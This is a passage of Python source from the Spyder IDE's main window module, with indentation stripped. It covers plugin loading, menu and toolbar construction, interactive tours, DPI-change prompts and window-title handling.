The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_
("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > Application > "
"Interface</tt>, in case Spyder is not displayed "
"correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
